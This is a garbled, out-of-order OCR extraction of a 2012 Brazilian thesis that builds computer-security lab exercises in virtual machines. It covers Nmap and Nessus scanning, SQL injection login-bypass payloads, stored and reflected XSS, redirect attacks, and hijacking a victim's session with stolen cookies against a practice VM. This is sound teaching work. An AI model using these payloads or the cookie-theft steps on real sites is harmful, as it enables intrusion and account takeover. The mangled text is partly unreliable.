Home
universidade federal de santa catarina - Projetos
Contents
1. 81 FIGURA 12 EXEM PLO 2 DE SA DA DO NMAP u I nanaii nennen rennen nene 83 FIGURA 13 EXEM PLO 1 DE COM UNICAC O DO NM AP COM O ALVO nnne nnne nenne nnne nnne nnns 84 FIGURA 14 EXEM PLO 2 DE COM UNICAC O DO NM AP COM O ALVO nnn nennen nnns 84 FIGURA 15 EXEM PLO DE COM UNICAC O DO NM AP COM O ALVO nennen nena nnn nnns 85 FIGURA 16 EXEMPLOS DE SAIDA DO N MAD nitro ten er tnr en Pre n irr iras 86 FIGURA 17 EXEM PLO 4 DE COM UNICAC O DO NM AP COM O ALVO nnne nnne nnn nnn nena nini 86 FIGURA 18 ATIVA O DO FIREWALL NO WINDOWS enne nnne nennen nien nnn nnne arias 88 FIGURA 19 EXEMPLO 4 DE SAIDA DO NMIAP cc 551 rn inr tn erm tre pe e einn ea rd erba nie 90 FIGURA 20 EXEM PLO 5 DE SA DA DO NM AP nn n 90 FIGURA 21 INSTALA O DO NESSUS etui Cede rhe mas o f e m E TAS 93 FIGURA 22 INTERFACE WEB SERVER DO 55 5 eene ener nennen 93 FIGURA 23 OBTEN O DE C DIGO DE ATIVA O DO 55 5 2 nnne nnne nan nennen nnne 94 FIGURA 24 POL TICAS PR DEF
2. Figura 13 Exemplo 1 de comunica o do NMAP com o alvo Caso a porta esteja aberta vamos receber um pacote TCP SYN ACK e teoricamente dever amos responder com um pacote TCP ACK para finalmente completar o handshake de 3 vias e estabelecermos uma conex o com o alvo como mostra a figura 14 NMAP Conex o estabelecida com a porta do alvo TCP SYN TCP SYN ACK TCP ACK Figura 14 Exemplo 2 de comunica o do NMAP com o alvo 85 Entretanto se respondermos com um pacote TCP ACK e estabelecermos uma conex o com o host alvo iremos expor a nossa conex o podendo levar a detec o da nossa varredura Para isso o Nmap ir responder com um pacote RST resetando a conex o e impedindo que ela seja completada como mostra a figura 15 Neste ponto o Nmap j capturou o pacote TCP SYN ACK e j sabe que a porta est aberta assim o fato de derrubar a conex o imediatamente ap s receber o pacote implica em n o sermos descobertos mas n o implica em perdas de informa es para o Nmap NMAP Conex o n o estabelecida com o alvo TCP SYN TCP SYN ACK Figura 15 Exemplo 3 de comunica o do NMAP com o alvo 3 Fa a o teste varrendo a rede com a op o 5 utilizando o comando nmap PS 192 168 6 1 24 Veja na sa da do Nmap mostrada pela figura 16 que agora ele est utilizando a t cnica de varredura por SYN 86 Initiating Parallel DNS resolution of 1 host at 16 15 Completed Pa
3. 3 lt HTML CSS DOM Inline Co 2 Cookies Filter Default Accept cookies Tools Name value Domain Size Path Expires PHPSESSID 8jlgm9ir68i8St0tm4129g480o 192 168 6 135 358 Session logged_in 1 192 168 6 135 10B sexta feira 4 de maio de 2012 02 28 10 user id 1 192 168 6 135 8B sexta feira 4 de maio de 2012 02 28 10 hash 25e4ee4e9229397b6b17776bfceaf8e7 192 168 6 135 36B sexta feira 4 de maio de 2012 02 28 10 Figura 45 Aba Cookies do Firebug 15 Para simularmos a sess o da v tima e obtermos autentica o crie no Firebug um cookie para cada valor correspondente que aparece no COOKIE do arquivo de log Para isso clique em Cookies na barra do Firebug e em seguida em Create cookie Preencha o campo Name com o nome do atributo e o campo Value com o valor do atributo Ap s preencher os 4 atributos voc deve visualizar algo como na figura 45 do passo 14 desta tarefa 16 Com os cookies preenchidos clique no menu Log In no site e observe o resultado Como resultado esperado voc deve ser automaticamente reconhecido e autenticado com as credenciais da v tima Tarefa 4 Teste de um ataque de XSS refletido Ao contr rio dos ataques de XSS armazenados os ataques de XSS refletidos n o ficam armazenados no banco de dados Desta forma o c digo malicioso ser enviado junto com a requisi o do usu rio e ser refletido de volta para o seu navegador O c digo malic
4. est aberta ou fechada Especifica o do Alvo Com o NMAP poss vel varrer hosts individuais mas tamb m redes inteiras ou hosts adjacentes a um especificado Para varrer um host nico basta digitar o endere o do host tal como 192 168 1 1 por exemplo Para varrer hosts adjacentes basta utilizar o estilo de endere amento CIDR Classless Inter Domain Routing especificando um endere o base e o n mero de bits o qual o NMAP dever manter no in cio do endere o fornecido nesta varredura Por exemplo 192 168 10 0 24 varreria os 256 hosts entre 192 168 10 0 bin rio 11000000 10101000 00001010 00000000 e 192 168 10 255 bin rio 11000000 10101000 00001010 11111111 De um total de 32 bits que comp es o endere o apenas os 24 primeiros ser o mantidos variando os 8 ltimos 54 Al m disso o NMAP permite mais de 1 tipo de especifica o de hosts na mesma linha de comando n o sendo necess rio repetir o comando para outros hosts desejados caso haja mais de 1 ou v rias faixas de hosts a serem pesquisadas Descoberta de Hosts Para os casos de redes muito grandes s vezes n o se sabe ao certo quais hosts varrer na rede Mesmo que se saiba a faixa de endere os a qual se deve varrer nem todos os hosts podem estar ativos no momento da varredura e por isso seria dispendioso fazer uma varredura de toda a rede porta a porta Por isso muitas vezes temos a necessidade de saber anteriormente quais s o os hosts existentes n
5. o feita com o Javascript Para isso utilizaremos outra ferramenta chamada Live HTTP Headers a qual ir nos auxiliar na captura leitura e edi o de cabe alhos de requisi es HTTP trocadas entre o nosso browser cliente e o servidor 7 Abra o Live HTTP Headers clicando no cone com um L na barra lateral esquerda do Mantra e verifique se a op o Capture da ferramenta est marcada como mostra a figura 33 Headers Generator Config About HTTP Headers Capture oecomee cs use nem x Figura 33 Como abrir o Live HTTP headers no MANTRA L Live headers ty 108 8 Mantenha o Live HTTP Headers aberto v at a p gina de login e entre com quaisquer dados para usu rio e senha clicando em seguida em Log In Voc ver que o Live HTTP Headers capturou o tr fego e mostra as informa es na aba Headers Procure nestas informag es a linha que cont m os dados de login como usu rio e senha Veja no exemplo da figura 34 E Live headers Headers Generator Config About HTTP Headers http 192 168 6 135 index php action login POST index php action login HTTP 1 1 Host 192 168 6 135 User Agent Mozilla 5 0 Windows NT 5 1 rv 9 0 1 Gecko 20100101 Firefox 9 0 1 FirePHP 0 6 Accept text html application xhtml xml application xml q 0 9 q 0 8 Accept Language en us en q 0 5 Accept Encoding gzip deflate Accept Charset 150 8859 1 utf 8 q 0
6. 1 sem os colchetes a instru o a ser gerada ser outra Como 1 sempre igual a 1 a instru o far com que todos os nomes de usu rios sejam retornados do banco de dados caso a opera o seja uma consulta Isso se d porque a aspa simples digitada completa a primeira j inserida pela aplica o e o restante do texto digitado interpretado como comando at encontrar o caractere sustenido que interpretado como coment rio no caso de o banco de dados ser o MySQL invalidando o resto da mesma linha 110 10 Substitua as informa es para que fiquem da seguinte forma username or 1 1 amp password or 1 1 sem os colchetes e em seguida clique em Replay Voc ver que ainda n o conseguimos efetuar a autentica o mas conseguimos obter ao menos um erro do banco de dados o que significa que estamos conseguindo injetar c digo diretamente no banco de dados sem passar pela verifica o do Javascript A figura 36 ilustra o erro obtido Query error with select user id from user where user username or 1 1 You have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use near line 2 Figura 36 Erro obtido ao tentar injetar c digo SQL O erro nos d uma informa o valiosa Agora sabemos que o banco de dados MySQL e portanto utilizaremos apenas tentativas de comandos com a sintaxe do MySQL Vamos tentar adicionar o caract
7. COOKIE PHPSESSID 8jlgm9ir68i85t0tm4 12994803 logged 1 user id 1 hashz25e4ee4e9229397b6b17776bfceaf8e7 Figura 43 Visualizagao de cookie Com estas informa es n s podemos nos autenticar perante o site utilizando as credenciais deste usu rio sem digitar seus dados de usu rio e senha Antes iremos limpar os cookies antigos no navegador Mantra 10 No navegador Mantra clique no menu principal e em seguida em Options gt Options como mostra a figura 44 Y Vs Ed 6 Wi V 55 Intro Download Google x E New Tab b Tools Start Private Browsing Bookmarks b History information miscellaneous Downloads Find Other Save Page As DEDE options z Help gt Send Link Menu Bar Print b Navigation Toolbar Web Developer gt Bookmarks Toolbar refspoof Toolbar Full Screen v Web Developer Toolbar Set Up Sync HackBar Exit Edit This Menu Add on Bar YY 34 42 v Tabs 6 Widgets Inc Home Layout Figura 44 Caminho para o menu Options do MANTRA 11 Clique na aba Privacy e em seguida no link remove individual cookies que fica dentro do painel History 12 Clique em Remove All Cookies e por seguinte em Close e OK 13 Abra o Firebug como mostra a figura 31 123 14 Clique na aba Cookie na barra principal do Firebug como mostra a figura V e 44
8. Category Attack Dispon vel em lt https www owasp org index php Category Attack gt Acessado em 30 de Junho de 2011 OWASP Cross site Scripting XSS Disponivel em lt https www owasp org index php Cross site_Scripting_ XSS gt Acessado em 30 de Junho de 2011 OWASP C OWASP 10 2010 Ten Most Critical Web Application Security Risks Dispon vel em lt http www owasp org index php Top_10 gt Acessado em 30 de Junho de 2011 OWASP SQL Injection Disponivel em lt https www owasp org index php SQL Injection Acessado em 30 de Junho de 2011 OWASP E Top 10 2010 A2 Cross Site Scripting XSS Dispon vel em https www owasp org index php Top 10 2010 A2 gt Acessado 8 de Maio de 2012 SHIREY Internet Security Glossary RFC2828 2000 Disponivel em lt http tools ietf org html rfc2828 gt Acessado em 30 de Junho de 2011 133 SOURCE FORGE Download Capture The Flag 6 Dispon vel em lt http sourceforge net projects lampsecurity files CaptureTheFlag ctf6 lampsecurity org ctf6 tar gz download gt Acessado em 8 de Maio de 2012 SYMANTEC Corporation 2011 Vulnerability Trends Disponivel em lt http www symantec com business threatreport topic jsp id vulnerability_trends amp aid total number of vulnerabilities gt Acessado em 30 de Junho de 2011 TENABLE Network Security Inc A Activation Code Dispon vel em lt http www nessus o
9. UNIVERSIDADE FEDERAL DE SANTA CATARINA DESENVOLVIMENTO DE ROTEIROS LABORATORIAIS DE SEGURANCA COMPUTACIONAL EM AMBIENTES VIRTUALIZADOS RODRIGO FANTINATI FERREIRA Florianopolis SC 2012 1 UNIVERSIDADE FEDERAL DE SANTA CATARINA DEPARTAMENTO DE INFORMATICA E ESTATISTICA Curso DE BACHARELADO EM CIENCIAS DA COMPUTA O DESENVOLVIMENTO DE ROTEIROS LABORATORIAIS DE SEGURAN A COMPUTACIONAL EM AMBIENTES VIRTUALIZADOS RODRIGO FANTINATI FERREIRA Orientadora Professora Dra CARLA MERKLE WESTPHALL Trabalho de conclus o de curso apresentado como parte dos requisitos para obten o do grau de Bacharel em Ci ncias da Computa o Florian polis SC 2012 1 RODRIGO FANTINATI FERREIRA DESENVOLVIMENTO DE ROTEIROS LABORATORIAIS DE SEGURANCA COMPUTACIONAL EM AMBIENTES VIRTUALIZADOS Trabalho de conclus o de curso apresentado como parte dos requisitos para obten o do grau de Bacharel em Ci ncias da Computa o Orientadora Professora Dra Carla Merkle Westphall Banca Examinadora Professor Dr Carlos Becker Westphall Professor Dr Jo o Bosco Mangueira Sobral Florian polis SC 2012 1 AGRADECIMENTOS Gostaria primeiramente de agradecer aos meus pais que me deram a oportunidade e todo o suporte necess rio para me manter na UFSC Professora Dra Carla Merkle Westphall por ter me orientado e me dado a oportunidade de desenvolver este trabalho Ao Professor Dr Carlos Becker West
10. proibida como por exemplo a transfer ncia de um stream de v deo o simples fato de um stream de v deo ser detectado mais importante do que o conte do do v deo propriamente dito 30 E por esse motivo que muitas vezes desejamos esconder a exist ncia dos dados pois em alguns casos a exist ncia dos dados acaba sendo mais importante do que o seu conte do BISHOP 2004 p 2 Quando estamos tratando de uma transa o de neg cios o requisito mais importante a confidencialidade pois caso os dados da transa o forem revelados a terceiros n o autorizados os dados do usu rio leg timo podem ser utilizados em opera es fraudulentas BELAPURKAR CHAKRABARTI PONNAPALLI VARADARAJAN 2009 p 44 Esconder recursos tamb m importante para a confidencialidade como no caso de um servidor web por exemplo que n o deseja que seus visitantes tenham acesso a informa es sobre o tipo de sistema operacional que est sendo utilizado nem o n mero de conex es m xima permitidas em um dado momento BISHOP 2004 p 2 2 3 2 Integridade A propriedade de integridade deve garantir que as informa es na computa o n o sejam modificadas sem a apropriada autoriza o LANDWEHR 2001 p 6 A integridade inclui integridade dos dados o conte do da informa o e a integridade da origem a fonte dos dados A fonte dos dados importante por garantir a exatid o e principalmente a credibilidade das informa es BI
11. Host Es Li 192 168 6 2 Starting Nmap 5 51 http nmap org at 2012 03 14 01 59 Hora oficial do Brasil NSE Loaded 57 scripts for scanning Initiating ARP Ping Scan at 01 59 Scanning 192 168 6 2 1 port Completed ARP Ping Scan at 01 59 0 13s elapsed 1 total hosts Initiating Parallel DNS resolution of 1 host at 01 59 Completed Parallel DNS resolution of 1 host at 01 59 0 28s elapsed Initiating SYN Stealth Scan at 01 59 Scanning 192 168 6 2 1000 ports Completed SYN Stealth Scan at 01 59 l 45s elapsed 1000 total ports Initiating Service scan at 01 59 Initiating OS detection try 1 against 192 168 6 2 Retrying 05 detection try 2 against 192 168 6 2 Nmap scan report for 192 168 6 2 Host is up 0 0016s latency Not shown 999 closed ports PORT STATE SERVICE VERSION 53 tcp filtered domain MAC Address 00 50 56 F6 D9 42 VMware Warning 055 results be unreliable because we could not find at least 1 open and 1 closed port Device type general purpose print server printer specialized WAP media device power device Rumning JUST GUESSING Bluebird SuperDOS 91 Brother embedded 91 Kapsch embedded 91 Ness embedded 91 Novatel embedded 91 Sony embedded 91 TechniSat embedded 91 APC AOS 2 91 Aggressive OS quesses Bluebird SuperDOS 91 Brother NC 130h print server 91 Brother HL 2070N 91 Brother HL 2070N printer 91 Brother HL 5070N printer 91 Brother M
12. es o NMAP consegue descobrir de maneira eficiente quais hosts est o dispon veis na rede e quais servi os estes oferecem poss vel ainda descobrir mais informa es do alvo varrido tais como tipo e vers o do sistema Operacional utilizado quais tipos de filtros de pacotes firewall est o em uso entre outras NMAP 2012 O resultado de uma varredura realizada com o NMAP conter entre outras informa es uma tabela de portas do alvo a qual o objeto principal do nosso estudo com esta ferramenta pois s o as informa es obtidas do estado de cada uma destas portas que ir compor um relat rio sobre a seguran a do alvo varrido Nesta tabela encontraremos e n mero da porta descoberta e O protocolo por ela utilizado e nome do servi o e O estado da porta que pode ser 53 o Aberto Uma aplica o esta escutando a porta e esperando recebimento de pacotes nesta porta o Filtrado Existe um filtro firewall ou algum outro obst culo na rede bloqueando a porta de forma que o NMAP n o consegue determinar se ela est aberta ou fechada o Fechado A porta recebe e responde aos pacotes enviados pelo NMAP entretanto n o existe nenhuma aplica o ouvindo a porta Portas fechadas tamb m necessitam de aten o e observa o pois em um determinado momento elas podem se abrir o N o Filtrado Para este caso a porta responde aos pacotes enviados pelo NMAP entretanto o NMAP n o consegue determinar se a porta
13. listadeportas ping usando TCP SYN Neste modo o NMAP envia um pacote TCP vazio com a flag SYN marcada Por padr o este pacote enviado porta 80 mas uma porta alternativa ou uma lista de portas pode ser especificada como par metro ex PS22 23 25 80 113 1050 35000 sendo que para mais de uma porta a varredura nas outras portas executada em paralelo A flag SYN indica aos sistemas remotos que h uma tentativa de estabelecer uma comunica o Normalmente a porta de destino estar fechada e um pacote RST reset ser enviado de volta Caso a porta esteja aberta o alvo ir dar o segundo passo do cumprimento de tr s vias 3 way handshake do TCP respondendo com um pacote TCP SYN ACK TCP A m quina executando o NMAP derruba ent o a conex o rec m criada respondendo com um RST ao inv s de enviar um pacote ACK que iria completar o cumprimento de tr s vias e estabelecer uma conex o completa O pacote RST enviado pelo kernel da m quina que est executando o NMAP em resposta ao SYN ACK inesperado e n o pelo pr prio NMAP PA listadeportas ping usando TCP ACK O ping utilizando TCP ACK funciona da mesma forma que o ping utilizando SYN A diferen a que nesta op o a flag TCP ACK marcada ou inv s da flag SYN O pacote ACK simula reconhecer dados de uma conex o TCP estabelecida quando na verdade nenhuma conex o existe de 56 fato Assim os hosts remotos ativos deveriam sempre responder com pacotes RST reve
14. rios problemas organiza o ou entidade para a qual foi designada A m forma o ou a falta de precis o de uma regra na pol tica de seguran a pode causar ambiguidade na interpreta o da mesma n o deixando claro se uma determinada a o ou n o permitida Essa imprecis o poder levar a uma dificuldade na aplica o da regra ou at em sua aplica o incorreta Para que a pol tica de seguran a seja bem elaborada necess rio agir de forma pr ativa e fazer uma an lise dos riscos antecipadamente evitando a abordagem reativa em rela o seguran a Segundo Nakamura e Geus 2007 p 192 existem alguns fatores que podem determinar o sucesso da pol tica de seguran a Vigil ncia necess rio vigiar constantemente os sistemas e a rede e saber responder corretamente aos alarmes e alertas evitando que poss veis incidentes de seguran a passem despercebidos e n o sejam tratados 34 Atitude necess rio educar conscientizar e treinar o grupo de pessoas que administra a rede e ou sistema a fim de que tenham uma conduta adequada perante a pol tica de seguran a estabelecida e possam aplic la e faz la valer Estrat gia necess rio definir a pol tica de seguran a levando em conta o ambiente na qual est sendo aplicada evitando por exemplo que as regras definidas interfiram negativamente na produtividade dos membros que compartilham a rede ou sistema Tecnologia A tecnologia utilizada deve a
15. script gt 4 Clique no bot o Add Event e em seguida viste a p gina Home clicando no sub menu da p gina e veja o resultado Como voc pode notar um popup foi lan ado na tela ao acessar a p gina Isso quer dizer que a p gina est vulner vel a ataques XSS e o conte do digitado nos formul rios n o est o sendo filtrados O tipo de ataque realizado foi do tipo armazenado porque o c digo JavaScript ficou armazenado pelo banco de dados no post que enviamos Toda vez que um usu rio acessar a p gina inicial os posts ser o exibidos e juntamente com eles o post contendo o c digo JavaScript injetado Desta forma o c digo ser executado no navegador de todos os usu rios que visualizarem o post exibindo o alerta com o texto XSSed 119 Tarefa 2 Causar o redirecionamento do usuario que acessar o site atacado para um outro site por meio de um ataque de XSS armazenado Agora vamos imaginar que ap s descobrir que o site est vulner vel a ataques XSS nos gostar amos de redirecionar todo usu rio que acess lo para outro site A finalidade de um redirecionamento pode variar de acordo com os objetivos do atacante O prop sito pode ser tanto para a exibi o de um site de publicidade quanto para a exibi o de um site clone que visa lesar o usu rio de alguma forma como por exemplo roubando seus dados 1 Na p gina inicial localize o post da tarefa anterior e clique em Edit this event 2 Troque a des
16. wild cards da cl usula LIKE est o propriamente codificados o Certifique se de que os dados recebidos da base de dados est o em um contexto apropriado da entrada de valida o e Normalize Padronize o Os filtros de valida o de entrada e codifica o da sa da devem ser executados depois que a entrada foi decodificada ou est na forma can nica 46 o Esteja ciente de que existem m ltiplas representa es de qualquer caractere e m ltiplas formas de codific lo o Onde poss vel utilize valida o de entradas do tipo White list e rejeite formas n o can nicas de entrada e Projete visando evitar os perigos de Inje o SQL o Use procedimentos armazenados para que voc possa ter permiss es mais granulares no n vel da base de dados o Voc pode usar uma camada de abstra o de acesso dados para refor ar a seguran a do acesso a dados atrav s de uma aplica o inteira Considere controles adicionais sobre informa es importantes em tempo de proje o e desenvolvimento 3 2 Cross Side Scripting XSS O que Cross Site Scripting Segundo a defini o da OWASP B 2011 ataques de Cross Site Scripting s o um tipo de problema de inje o no qual scripts maliciosos s o injetados em web sites confi veis A OWASP B 2011 categoriza os ataques XSS em 2 categorias e Armazenados Stored S o os ataques nos quais o c digo injetado permanentemente armazenado nos servidores alvo c
17. 1 AMBA AS d ee aa qala ond 23 22 02 ulheraDilidades ee a IIS 25 2 2 3 ATAQUES HE t eh i RR Et e OE ee Ra ee 27 2 3 PROPRIEDADES DE SEGURAN A L 242 Lene etes ee dei en Pe pt ese a epe Pe beech 28 2 34 Gonfidencialidade uuu a tue et c eee te ecu tee Qupa 29 2 3 2 Integridade oo ERR Ee o LE P eade cr A eR Eae 30 2 3 3 Disponibilidade 5 2 1 2 t o re aec eu teo tr 31 2 34 Autenticidade Z ur SA ee Asia ns Queste naue S 32 2 3 5 Nao Bhepudiacao 3 eed i beds Led 32 2 4 POL TICAS DE SEGURANGA 2 2 u ay e aee e EP ex eee ge ue eva eu Tu 33 2 5 MECANISMOS E T CNICAS DE 34 2 5 1 Grlptografia u doti e iei t tt e E Eee o Bt etaed 34 2 5 2 Autentica o ieee ionic cn eed dates 36 2 5 3 Gontrole de acesso cites dresden Pru aa otn so eo kot Ht igne 37 3 PRINCIPAIS FALHAS DE INJE O ENCONTRADAS NA SEGURAN A COMPUTACIONAL 38 9 oQLl INJECTION IRS ao Sa 39 3 2 CROSS SIDE SCRIPTING XSS Si 3 ie cee e 46 4 FERRAMENTAS DE AN LISE DE SEGURAN A 22 u GSS U 51
18. 255 Agora que sabemos qual o intervalo de hosts devemos varrer basta varrer todas as portas de todos os hosts certo Como n s pretendemos fazer isso de forma eficiente evitando um grande desperd cio de tempo a resposta Errado Ainda n o temos id ia de quantos hosts existem na rede e destes existentes quantos deles estar o ativos no momento em que realizarmos a varredura Pode ser interessante saber o total de hosts na rede e podemos economizar recursos e tempo varrendo somente os hosts que est o ativos neste momento Como nesta situa o estamos fazendo uma varredura em uma rede de nossa propriedade e n o temos problemas quanto identifica o de nossa varredura utilizaremos o tipo de varredura por ping para descoberta de hosts que pode ser facilmente detectado 2 Para isso digite no campo Comando nmap sP v 192 168 6 1 24 Este o comando para varrer com o Nmap utilizando a op o sP varredura usando ping na faixa de endere os CIDR de 192 168 6 0 at 192 168 6 255 A op o v faz com que o Nmap mostre mais informa es sobre a varredura ent o a partir de agora utilizaremos ela sempre Ao final da varredura o Nmap deve listar o estado de todos os hosts da rede e natural que muitos deles estejam inativos como mostra a figura 12 pois o n mero de m quinas virtuais que podemos executar simultaneamente n o muito grande 83 Nmap scan report for 192 168 6 132 host down Nmap scan report for 192 1
19. 3 Asie tas SE SA u q Sk di Sa 127 REFER NCIAS BIBLIOGR FICAS U U u 128 LISTA DE ABREVIATURAS E SIGLAS ACK ACKNOWLEDGE AMD ADVANCED MICRO DEVICES ARM ADVANCED RISC MACHINE BID BUGTRAQ IDENTIFIER CERT CENTRO DE ESTUDOS RESPOSTA E TRATAM ENTO DE INCIDENTES CGI COMMON GATEWAY INTERFACE CIDR CLASSLESS INTER DOM AIN ROUTING CPU CENTRAL PROCESSING UNIT CTF CAPTURE THE FLAG CVE COMMON VULNERABILITIES AND EXPOSURES CVSS COMM ON VULNERABILITY SCORING SYSTEM DNS DOMAIN NAM E SYSTEM DOM DOCUM ENT OBJECT M ODEL DSS DATA SECURITY STANDARD FTP FILE TRANSFER PROTOCOL HEX HEXADECIM AL HTM L HYPERTEXT MARKUP LANGUAGE HTTP HYPERTEXT TRANSFER PROTOCOL HTTPS HYPERTEXT TRANSFER PROTOCOL SECURE IBM INTERNATIONAL BUSINESS M ACHINES ICMP INTERNET CONTROL M ESSAGE PROTOCOL IDS INTRUSION DETECTION SYSTEM IM APS SECURE INTERNET ESSAGE ACCESS PROTOCOL IP INTERNET PROTOCOL KB KILOBYTES LFI LOCAL FILE INCLUSION MB MEGABYTES NASL NESSUS ATTACK SCRIPTING LANGUAGE OS OPERATING SYSTEM OSVDB OPEN SOURCE VULNERABILITY DATABASE PCI PAYMENT CARD INDUSTRY PHP PHP HYPERTEXT PREPROCESSOR PKI PUBLIC KEY INFRASTRUCTURE RAM RANDOM ACCESS M EM ORY RFI REM OTE FILE INCLUSION RST RESET SMTPS SECURE SIM PLE M AIL TRANSFER PROTOCOL SO SISTEMA OPERACIONAL SQL STRUCTURED QUERY
20. 4 1 5CANNER DE REDE NMAD u bii n au umu usaha iayta SL 51 4 2 SCANNER DE VULNERABILIDADES NESSUS 60 5 O USO DE VIRTUALIZACAO NO ENSINO DE SEGURAN QA 67 OQUE E VIRTUALIZA O us MS Das eh he ees 67 5 2 A APLICA O DE VIRTUALIZA O NO ENSINO DE SEGURANQA 69 5 3 TRABALHOS RELACIONADOS COM O USO DE VIRTUALIZA O NO ENSINO DE SEGURAN A 72 5 4 A EMULACAO DO ATAQUE 0 ci on NE a E 73 5 5 A CONSTRU O DO AMBIENTE VIRTUAL 74 6 ROTEIROS LABORATORIAIS sa ssasssasusasa 77 6 1 SCANNER DE REDE UTILIZANDO 2 2 0 04 2 2 0 000 nnn nnn 77 6 2 SCANNER DE VULNERABILIDADES UTILIZANDO O NESSUS 91 6 3 SQL INJECTION UTILIZANDO O 103 6 4 CROSS SITE SCRIPTING XSS UTILIZANDO O 116 7 CONSIDERA ES FINAIS tes eee aaa R E 125 TRABALHOS FUTUROS
21. MANTRA 112 FIGURA 38 BOT O PARA INCREM ENTO DO NUM ERO DE TABELAS NA HACKBAR iier nnn 113 FIGURA 39 CAM INHO PARA EXECUTAR O COM ANDO UNION SELECT STATEM ENT NA HACKBAR nsn 114 FIGURA 40 VISUALIZA O DA P GINA ALVO AP S INJE O DE C DIGO SQL sse nennen 115 FIGURA 41 CAM INHO PARA DECIFRAR UM A SENHA NA HACKBAR 116 FIGURA 42 C DIGO DO ARQUIVO STEAL IPHP I iini asqa repe ie ahua qasaqa 120 FIGURA 43 VISUALIZA O DE COOKIE eoi rep d doe Ed E o AE PERO Res 122 FIGURA 44 CAM INHO PARA O MENU OPTIONS DO 122 FIGURA 45 COOKIES DO FIREBUG 321 ente marre pen o eaa pl d RE Pe HERE a 123 FIGURA 46 CODIGO DO ARQUIVO TESTE PEP LI IL rx e Rena av ro dt FA ad 124 FIGURA 47 FORM A O DO C DIGO DA P GINA ATACADA AP S UM ATAQUE 56 1 0 125 LISTA DE TABELAS TABELA 1 ATIVIDADE ALICIOSA POR FONTE RANKING PANOR MICO 2009 2010 SYMANTEC 2011 TABELA 2 TABELA DOS 10 PROBLEM AS MAIS CR TICOS DE SEGURAN A EM APLICA ES WEB OW ASP C 2011 13 1 INTRODU O 1 1 Motiva o Em seguran a computacional bem como em v rias outras reas estudos laboratoriais
22. Managers gt fs a Outines Resizer view Source 1 Options 4 Privacy and Security gt Downloads Find Debug Tools gt Save Page As Utilities gt Sond Eye Editors 9m Print Network Utilities Web Developer gt Misc 4 Application Auditing REST Client Full Screen E amesema 20 DP Sv Live HTTP headers gt Exit Edit This Menu Uncategorised HttpFox YY xn CU HttpRequester E RefControl Options CTF 6 Widgets Inc Homepage cer sent Web Developer gt 2 Home Log In In Web Developer gt z SOA Client gt amp Selenium IDE L Poster co About Us Log In Groundspeed 5 E Show hide hackbar m Are you looking to buy or sell widgets Please Authentic E modiy ES Widgets Inc is the internet s longest running readers bi and most respected vendor of widgets We Username can supply your widget needs or provide you paes SQL Inject ME Open SQL Inject Me Sidebar with reseller materials Whatever your interest x55 ME ie Options amp in widgets we re here to help you Our About dedicated staff of professionals can provide Cookies Manager Help 24 7 widget support We make sure your E Figura 29 Como abrir a SQL Inject Me Sidebar no MANTRA 105 4 seguida marque todas as op es para serem testadas e clique em Test all forms with all attacks como mostra a figura 30 a
23. Windows ajuda a proteger seu computador impedindo que usu rios gt n o autorizados obtenham acesso ao seu computador ou pela Internet por uma rede As Atualiza es Autom ticas est o desativadas Seu computador est mais vulner vel a v rus outras amea as de seguran a Clique em Ativar Atualiza es Autom ticas para que o Windows Ativado recomend vel automaticamente mantenha seu computador em dia com as atualiza es mais importantes Como e as Atualiza es Autom ticas ajudam a proteger meu computador Esta configura o impede que todas as fontes externas se conectem Ativar Atualiza es Autom ticas computador exceto aquelas selecionadas na N o permitir exce es Protecao contra virus Selecione esta caixa quando voc se conectar a redes p blicas em O Windows n o encontrou nenhum programa antivirus neste computador Programas antivirus locais menos seguras como aeroportos Voc ser notificado quando ajudam a proteger seu computador contra v rus e outras amea as de seguran a Clique em 9 Firewall do Windows bloquear programas Sele es na guia Recomenda es para obter sugest es de a es a serem tomadas Como programas antivirus Exce es ser o ignoradas ajudam a proteger meu computador Desativado n o recomend vel Obs O Windows n o detecta todos os programas antivirus Evite usar esta configura o desativa o do Fi
24. a op o de TCP SYN do Nmap pois esta op o utiliza pacotes brutos e para utilizar estes pacotes necess rio ter privil gios de administrador ou root Entretanto existe uma op o de varredura de portas no Nmap para este caso e ela se chama Scan TCP Connect 5 Para realizar este teste utilize de prefer ncia um terminal de uma m quina virtual Ubuntu sem o privil gio de root Certifique se antes de que haja na rede pelo menos 1 m quina virtual Windows com o Firewall do Windows ativado 1 Digite o comando nmap 5 v 192 168 6 X Substitua o X pelo n mero final de um IP que voc encontrou em sua rede durante a descoberta de hosts Voc ainda pode colocar uma faixa de IPs no lugar de apenas 1 caso tenha encontrado v rios IPs sequenciais na rede ou ent o pode digitar v rios endere os de IPs na mesma pesquisa 90 Voc ira notar que o Nmap n o conseguiu identificar a presen a da maquina alvo na rede como mostrado na figura 19 pois o Firewall do Windows est descartando o pedido de conex o enviado pelo Nmap x labtest ubuntu File Edit View Search Terminal Help labtest ubuntu nmap v sT 192 168 6 131 Starting Nmap 5 21 http nmap org at 2012 03 13 04 34 PDT Initiating Ping Scan at 04 34 Scanning 192 168 6 131 2 ports Completed Ping Scan at 04 34 3 02s elapsed 1 total hosts Nmap scan report for 192 168 6 131 host down Read data files from usr share nmap Note Host seems
25. autentica o utilizam t cnicas nas quais cada resposta v lida e correta para o processo de autentica o difere para cada processo de autentica o LANDWEHR 2001 p 8 2 5 3 Controle de acesso Nakamura e Geus 2007 p 375 definem que acesso a habilidade de realizar algo com recursos computacionais e a autoriza o a permiss o dada direta ou indiretamente pelo sistema ou pelo dono do recurso para a utiliza o do mesmo 38 A autentica o do usu rio perante o sistema um passo fundamental e indispens vel antes de conceder a esse usu rio qualquer tipo de acesso a qualquer parte do sistema ou a execu o de qualquer tipo de opera o BELAPURKAR CHAKRABARTI PONNAPALLI VARADARAJAN 2009 p 43 Desta forma o controle de acesso um mecanismo utilizado para controlar os n veis de acesso privil gios que um determinado usu rio pode ter em um sistema permitindo o acessar dados e realizar opera es dentro de seu n vel de permiss o e negando acessos e opera es n o autorizadas fora de seu n vel de permiss o VACCA 2009 p 59 O controle de acesso l gico respons vel pelo controle sobre informa es referentes aos recursos computacionais e pelos diversos n veis de acesso existentes se encarrega de e Proteger sistemas operacionais e outros softwares contra modifica es ou manipula es n o autorizadas garantindo sua integridade e disponibilidade e Garantir a integridade e dispo
